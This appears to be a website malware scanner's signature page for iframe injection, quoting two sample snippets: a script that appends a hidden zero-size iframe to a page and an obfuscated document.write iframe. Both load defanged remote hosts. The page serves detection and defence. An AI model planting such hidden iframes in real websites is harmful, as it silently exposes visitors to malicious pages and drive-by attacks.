SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware.iframe_injection

malware.iframe_injection

Description:
Suspicious code that injects iframes into a web page.

There are many different ways to write code that injects iframes. For example:

<script type='text/javascript'> function create_frame(url) { var melm = document.​getElementById('partyeverybody28'); if
(typeof(melm) != 'undefined' && melm!= null) {}else{ var iframe = document.createElement('​iframe'); 
iframe.​id = "partyeverybody28"; iframe.style.width = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; 
iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(​iframe); iframe.sr
c = url; return true; } } 
function toyotahondaporsche(​){ create_frame("hxxp://reexjad.servebbs[.]com/"); } 
...

or

document​.write('<iframe src="'+'hx'+'xp://m'+'iss.'+'dic[.]'+'as/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="​0" height="​0" frameborder="0"></iframe>');

Affecting: Any web site (no specific target).